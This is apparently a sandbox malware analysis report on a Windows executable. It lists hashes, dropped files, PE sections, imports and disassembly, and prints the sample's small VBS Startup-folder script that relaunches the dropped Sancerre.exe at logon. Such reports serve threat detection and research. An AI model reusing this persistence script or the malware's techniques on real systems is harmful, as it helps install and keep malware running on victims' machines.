                                                                                                          C:\Users\user\AppData\Local\Temp\Sheitan

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\AHSlIDftf1.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):277504
                                                                                                          Entropy (8bit):6.975942575675689
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:uwJI8q6tYOtYva9KApBzhjVir3QTeHAJZopoqzMZDKI4/gHDby8:v46NYv/ShhQrIeg1lfy8
                                                                                                          MD5:F869B778A6374726791AE1540CCE1D09
                                                                                                          SHA1:393C32254038C02A78711EF75BADB337A33263A0
                                                                                                          SHA-256:DC2C4AEBFB035311A24D8E274417684BDA6EAD097AACF6CC9B19D7D2F64AAC8A
                                                                                                          SHA-512:BCD8986D87F755332DFB515A686C02ABDFB16C7AB33D403AF2DA747857C547DBE52E8AAAFD33AD01E3A5C59D329F154DBE9C768D88280F31E1ABBA45CFC23134
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:yc.D0PGV3O3A..11.Q732TE5.ZZLP049ZD3PGV7O3AI611SQ732TE5SZZLP0.9ZD=O.X7.:.h.0}.pc[['eE!5=>1].Z;*]?3vU*.3<X.X=qs|at(Z7?tA]:.9ZD3PGVg.3A.721..U2TE5SZZL.068QEcPGp3O3UI611SQiw6TE.SZZ,T049.D3pGV7M3AM611SQ736TE5SZZLP.09ZF3PGV7O1A..11CQ7#2TE5CZZ\P049ZD#PGV7O3AI611_.33}TE5S:^LG 49ZD3PGV7O3AI611SQ7.6TI5SZZLP049ZD3PGV7O3AI611SQ732TE5SZZLP049ZD3PGV7O3AI61.SQ?32TE5SZZLP0<.ZD{PGV7O3AI611}%RKFTE57~^LP.49Zb7PGT7O3AI611SQ732Te5S:t>#BW9ZD$@GV7/7AI$11Sy332TE5SZZLP049.D3.i$R#\"I6=1SQ7.6TE7SZZvT049ZD3PGV7O3A.61sSQ732TE5SZZLP049..7PGV7O{AI631VQc.0T..RZYLP0.9ZB..EV.O3AI611SQ732TE5SZZLP049ZD3PGV7O3AI611SQ732T.H.U...YG..D3PGV7N1BM099SQ732TE5-ZZL.049.D3PpV7O.AI6\1SQ.32T;5SZ$LP0P9ZDAPGVVO3A.611<Q73\TE5-ZZLN2..ZD9zaV5g.AI<1..".32^.4SZ^?s043.F3PC%.O3K.511W".32^.1SZ^?v043.A3PC|mO0._011H>.32^E6.O\LP+..ZF.jGV=O.gI5.$UQ7(.vE7.SZLT.bJGD3Vo.7O95@613.[736~[7{.ZLZ..GQD3TlV.mMMI65.S{.M?TE1xZpRR.99Z@.r9X7O7jI..O\Q77.To+Q.ULP4..$T3PC}7e.?X615xQ..LFE5WqZfrN'9Z@.PmtI[3AM.1.q/"32Pn5yx$ZP00.Zn..PV7K.Ac.O)SQ3.2~[7.BZLT.2.8DAhQVGL

                                                                                                          C:\Users\user\AppData\Local\Temp\aut2EE4.tmp

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\AppData\Local\konked\Sancerre.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):132122
                                                                                                          Entropy (8bit):7.93957243489196
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:9auLLR0FbFtdxC4EBIinzDNYhtpLuByhiqaqcX1BaZW5tHbXpLjCrM/fuBXkBTKY:9fobFbM4EBzups1gW/JCM/gXwTpb/q/O
                                                                                                          MD5:FA5A3A7EF55BB5C2607645FA1294FD1F
                                                                                                          SHA1:7D9F421E18A5F83920655BA70369B48842876829
                                                                                                          SHA-256:435C4B5837DA8AB542CDFF3CB78E17A818379BC988C80F55E27A78926548993A
                                                                                                          SHA-512:A75441FCAC4AD54B9504DC52B349AC36335FCE7609E196C3A1BCAAD51CED1877F3B271471D9ECC7E9D356EF741660C3FB244E0639F6F8A682069E303152B61D8
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:EA06..<....TI.B.V...t..&c1..f.9.R.5..T..i9.Q&`....x..3....j`....x.......u..c......[...Y..{>..b....?......yX..'.....t.V......:..-f....`.y......@....M...-..G..K.P..Zn.j..*.<K*...j.3..K.....-........j..i.......hu....i..U..,H.4._...w...u^.Q....6.mT..xd.;.....5:...{...j.{.<..KR.......L.D.....G..-|6P.b.>....D...xK...L..x....>...!i.T.u..&m=....n.<].....&m1..Z|q....z..<.9.Z.c.L*..]J.Y..3..._.........x.}W...Vh.m(..)...6a9...jZ.xE.-1P....`...xD......$.Z*..E....-....x.xW..3N.G.R....V...T.L.c....9.{.4......i3....9,N.3..f...^E...f ....y.....m>a...&3.D...<Qf..}r.P....4n.G.Oi.=&k.Uj3yDb.E...u.eR5b.Q.:..+7..f....g..;.......S+Q....D..-.h.M......+M..(...j.R.l'3...3r..&............3T...=..2.4.F.@.b.7..g....kx..b4.5.kW...*t....T-.JMl....cw.|.g2.[.....P.L"U.tF]P.M.q...)O...38...X..-..NqD..*5j=2....Fo9.Oh.Z.j.v.S...D....M.[_.mO........-....,...4...C..n.I.F|.:..7..Qfu;...R.p.5.t.D...:-.eL.....%R.N..T...i9.X.7..^oE....H.,....$...N...Z.8%.c..Q...*.@...Y.>L..\:..:C,.Q&

                                                                                                          C:\Users\user\AppData\Local\Temp\autE6FE.tmp

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\AHSlIDftf1.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):132122
                                                                                                          Entropy (8bit):7.93957243489196
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:9auLLR0FbFtdxC4EBIinzDNYhtpLuByhiqaqcX1BaZW5tHbXpLjCrM/fuBXkBTKY:9fobFbM4EBzups1gW/JCM/gXwTpb/q/O
                                                                                                          MD5:FA5A3A7EF55BB5C2607645FA1294FD1F
                                                                                                          SHA1:7D9F421E18A5F83920655BA70369B48842876829
                                                                                                          SHA-256:435C4B5837DA8AB542CDFF3CB78E17A818379BC988C80F55E27A78926548993A
                                                                                                          SHA-512:A75441FCAC4AD54B9504DC52B349AC36335FCE7609E196C3A1BCAAD51CED1877F3B271471D9ECC7E9D356EF741660C3FB244E0639F6F8A682069E303152B61D8
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:EA06..<....TI.B.V...t..&c1..f.9.R.5..T..i9.Q&`....x..3....j`....x.......u..c......[...Y..{>..b....?......yX..'.....t.V......:..-f....`.y......@....M...-..G..K.P..Zn.j..*.<K*...j.3..K.....-........j..i.......hu....i..U..,H.4._...w...u^.Q....6.mT..xd.;.....5:...{...j.{.<..KR.......L.D.....G..-|6P.b.>....D...xK...L..x....>...!i.T.u..&m=....n.<].....&m1..Z|q....z..<.9.Z.c.L*..]J.Y..3..._.........x.}W...Vh.m(..)...6a9...jZ.xE.-1P....`...xD......$.Z*..E....-....x.xW..3N.G.R....V...T.L.c....9.{.4......i3....9,N.3..f...^E...f ....y.....m>a...&3.D...<Qf..}r.P....4n.G.Oi.=&k.Uj3yDb.E...u.eR5b.Q.:..+7..f....g..;.......S+Q....D..-.h.M......+M..(...j.R.l'3...3r..&............3T...=..2.4.F.@.b.7..g....kx..b4.5.kW...*t....T-.JMl....cw.|.g2.[.....P.L"U.tF]P.M.q...)O...38...X..-..NqD..*5j=2....Fo9.Oh.Z.j.v.S...D....M.[_.mO........-....,...4...C..n.I.F|.:..7..Qfu;...R.p.5.t.D...:-.eL.....%R.N..T...i9.X.7..^oE....H.,....$...N...Z.8%.c..Q...*.@...Y.>L..\:..:C,.Q&

                                                                                                          C:\Users\user\AppData\Local\Temp\autF352.tmp

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\AppData\Local\konked\Sancerre.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):132122
                                                                                                          Entropy (8bit):7.93957243489196
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:9auLLR0FbFtdxC4EBIinzDNYhtpLuByhiqaqcX1BaZW5tHbXpLjCrM/fuBXkBTKY:9fobFbM4EBzups1gW/JCM/gXwTpb/q/O
                                                                                                          MD5:FA5A3A7EF55BB5C2607645FA1294FD1F
                                                                                                          SHA1:7D9F421E18A5F83920655BA70369B48842876829
                                                                                                          SHA-256:435C4B5837DA8AB542CDFF3CB78E17A818379BC988C80F55E27A78926548993A
                                                                                                          SHA-512:A75441FCAC4AD54B9504DC52B349AC36335FCE7609E196C3A1BCAAD51CED1877F3B271471D9ECC7E9D356EF741660C3FB244E0639F6F8A682069E303152B61D8
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:EA06..<....TI.B.V...t..&c1..f.9.R.5..T..i9.Q&`....x..3....j`....x.......u..c......[...Y..{>..b....?......yX..'.....t.V......:..-f....`.y......@....M...-..G..K.P..Zn.j..*.<K*...j.3..K.....-........j..i.......hu....i..U..,H.4._...w...u^.Q....6.mT..xd.;.....5:...{...j.{.<..KR.......L.D.....G..-|6P.b.>....D...xK...L..x....>...!i.T.u..&m=....n.<].....&m1..Z|q....z..<.9.Z.c.L*..]J.Y..3..._.........x.}W...Vh.m(..)...6a9...jZ.xE.-1P....`...xD......$.Z*..E....-....x.xW..3N.G.R....V...T.L.c....9.{.4......i3....9,N.3..f...^E...f ....y.....m>a...&3.D...<Qf..}r.P....4n.G.Oi.=&k.Uj3yDb.E...u.eR5b.Q.:..+7..f....g..;.......S+Q....D..-.h.M......+M..(...j.R.l'3...3r..&............3T...=..2.4.F.@.b.7..g....kx..b4.5.kW...*t....T-.JMl....cw.|.g2.[.....P.L"U.tF]P.M.q...)O...38...X..-..NqD..*5j=2....Fo9.Oh.Z.j.v.S...D....M.[_.mO........-....,...4...C..n.I.F|.:..7..Qfu;...R.p.5.t.D...:-.eL.....%R.N..T...i9.X.7..^oE....H.,....$...N...Z.8%.c..Q...*.@...Y.>L..\:..:C,.Q&

                                                                                                          C:\Users\user\AppData\Local\konked\Sancerre.exe

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\AHSlIDftf1.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1109504
                                                                                                          Entropy (8bit):6.9554910707129105
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:KqDEvCTbMWu7rQYlBQcBiT6rprG8apy1OcKWb:KTvC/MTQYxsWR7apy1OcK
                                                                                                          MD5:6A0297E362831D810A049E0EF860147E
                                                                                                          SHA1:0D5D32CA2B5E36FCC209A7FC6EE12EFBF3CF572F
                                                                                                          SHA-256:E66DC1E184E0838C2C811BEBC1780A4E17C0E005AF799ECFEBC4868664B94A0F
                                                                                                          SHA-512:CC4B91E47A2D5B7A8B01CA973646D7342671C0497A59FFBD493DC5AC74DBFBB4940B443DF064ED6E26C0E5011FAF63562C6290055C5EFE6463689971C936B3CA
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          • Antivirus: ReversingLabs, Detection: 74%
                                                                                                          Reputation:low
                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L.....bg.........."..........>......w.............@..........................P............@...@.......@.....................d...|....@..<........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...<....@......................@..@.reloc...u.......v...x..............@..B........................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sancerre.vbs

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\AppData\Local\konked\Sancerre.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):270
                                                                                                          Entropy (8bit):3.403985785911199
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:DMM8lfm3OOQdUfcloRKUEZ+lX1Ol+HafDdnriIM8lfQVn:DsO+vNloRKQ1rHiRmA2n
                                                                                                          MD5:94657BBF7F65C76FD12F61EE36B42590
                                                                                                          SHA1:78836B34CFACD20A1F3F1A57B8C6ED3F6A66E324
                                                                                                          SHA-256:1FF228A10AAF28969B108BFEEA92DBAEC1AA18C5DD8372E5B447720D3B40E89F
                                                                                                          SHA-512:EA5C80EA800EA30594A237BAB00DBDCEA36CDCCD9D4EBD20812191368CD20A165A7465E83E2699069939CD73802C1467F2E3DD31248DCCC6D6BF26B173B9C5E9
                                                                                                          Malicious:true
                                                                                                          Reputation:low
                                                                                                          Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.k.o.n.k.e.d.\.S.a.n.c.e.r.r.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Entropy (8bit):6.9554910707129105
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:AHSlIDftf1.exe
                                                                                                          File size:1'109'504 bytes
                                                                                                          MD5:6a0297e362831d810a049e0ef860147e
                                                                                                          SHA1:0d5d32ca2b5e36fcc209a7fc6ee12efbf3cf572f
                                                                                                          SHA256:e66dc1e184e0838c2c811bebc1780a4e17c0e005af799ecfebc4868664b94a0f
                                                                                                          SHA512:cc4b91e47a2d5b7a8b01ca973646d7342671c0497a59ffbd493dc5ac74dbfbb4940b443df064ed6e26c0e5011faf63562c6290055c5efe6463689971c936b3ca
                                                                                                          SSDEEP:24576:KqDEvCTbMWu7rQYlBQcBiT6rprG8apy1OcKWb:KTvC/MTQYxsWR7apy1OcK
                                                                                                          TLSH:8A35AF027391C062FFAB92334F5AF6515BBC69260123E61F13981D7ABE701B1563E7A3
                                                                                                          File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                                                                                          File Icon

                                                                                                          Icon Hash:aaf3e3e3938382a0

                                                                                                          Static PE Info

                                                                                                          General

                                                                                                          Entrypoint:0x420577
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0x676284A7 [Wed Dec 18 08:15:35 2024 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:5
                                                                                                          OS Version Minor:1
                                                                                                          File Version Major:5
                                                                                                          File Version Minor:1
                                                                                                          Subsystem Version Major:5
                                                                                                          Subsystem Version Minor:1
                                                                                                          Import Hash:948cc502fe9226992dce9417f952fce3

                                                                                                          Entrypoint Preview

                                                                                                          Instruction
                                                                                                          call 00007F7784C7BEA3h
                                                                                                          jmp 00007F7784C7B7AFh
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          push esi
                                                                                                          push dword ptr [ebp+08h]
                                                                                                          mov esi, ecx
                                                                                                          call 00007F7784C7B98Dh
                                                                                                          mov dword ptr [esi], 0049FDF0h
                                                                                                          mov eax, esi
                                                                                                          pop esi
                                                                                                          pop ebp
                                                                                                          retn 0004h
                                                                                                          and dword ptr [ecx+04h], 00000000h
                                                                                                          mov eax, ecx
                                                                                                          and dword ptr [ecx+08h], 00000000h
                                                                                                          mov dword ptr [ecx+04h], 0049FDF8h
                                                                                                          mov dword ptr [ecx], 0049FDF0h
                                                                                                          ret
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          push esi
                                                                                                          push dword ptr [ebp+08h]
                                                                                                          mov esi, ecx
                                                                                                          call 00007F7784C7B95Ah
                                                                                                          mov dword ptr [esi], 0049FE0Ch
                                                                                                          mov eax, esi
                                                                                                          pop esi
                                                                                                          pop ebp
                                                                                                          retn 0004h
                                                                                                          and dword ptr [ecx+04h], 00000000h
                                                                                                          mov eax, ecx
                                                                                                          and dword ptr [ecx+08h], 00000000h
                                                                                                          mov dword ptr [ecx+04h], 0049FE14h
                                                                                                          mov dword ptr [ecx], 0049FE0Ch
                                                                                                          ret
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          push esi
                                                                                                          mov esi, ecx
                                                                                                          lea eax, dword ptr [esi+04h]
                                                                                                          mov dword ptr [esi], 0049FDD0h
                                                                                                          and dword ptr [eax], 00000000h
                                                                                                          and dword ptr [eax+04h], 00000000h
                                                                                                          push eax
                                                                                                          mov eax, dword ptr [ebp+08h]
                                                                                                          add eax, 04h
                                                                                                          push eax
                                                                                                          call 00007F7784C7E54Dh
                                                                                                          pop ecx
                                                                                                          pop ecx
                                                                                                          mov eax, esi
                                                                                                          pop esi
                                                                                                          pop ebp
                                                                                                          retn 0004h
                                                                                                          lea eax, dword ptr [ecx+04h]
                                                                                                          mov dword ptr [ecx], 0049FDD0h
                                                                                                          push eax
                                                                                                          call 00007F7784C7E598h
                                                                                                          pop ecx
                                                                                                          ret
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          push esi
                                                                                                          mov esi, ecx
                                                                                                          lea eax, dword ptr [esi+04h]
                                                                                                          mov dword ptr [esi], 0049FDD0h
                                                                                                          push eax
                                                                                                          call 00007F7784C7E581h
                                                                                                          test byte ptr [ebp+08h], 00000001h
                                                                                                          pop ecx

                                                                                                          Rich Headers

                                                                                                          Programming Language:
                                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                                          • [IMP] VS2008 SP1 build 30729

                                                                                                          Data Directories

                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x3823c.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x10d0000x7594.reloc
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                          Sections

                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                          .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .rsrc0xd40000x3823c0x38400e9ed31415c60d1c956dccab2c93fe4e4False0.8819618055555556data7.7842250713721IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .reloc0x10d0000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                          Resources

                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                          RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                          RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                          RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                          RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                                          RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                                          RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                                          RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                                          RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                                          RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                                          RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                                          RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                                          RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                                                                                                          RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                                          RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                                                                                                          RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                                          RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                          RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                          RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                                          RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                          RT_RCDATA0xdc7b80x2f501data1.0003405695768166
                                                                                                          RT_GROUP_ICON0x10bcbc0x76dataEnglishGreat Britain0.6610169491525424
                                                                                                          RT_GROUP_ICON0x10bd340x14dataEnglishGreat Britain1.25
                                                                                                          RT_GROUP_ICON0x10bd480x14dataEnglishGreat Britain1.15
                                                                                                          RT_GROUP_ICON0x10bd5c0x14dataEnglishGreat Britain1.25
                                                                                                          RT_VERSION0x10bd700xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                          RT_MANIFEST0x10be4c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                                                          Imports

                                                                                                          DLLImport
                                                                                                          WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                                                          VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                          COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                          MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                                                          WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                                                          PSAPI.DLLGetProcessMemoryInfo
                                                                                                          IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                                                          USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                                                          UxTheme.dllIsThemeActive
                                                                                                          KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
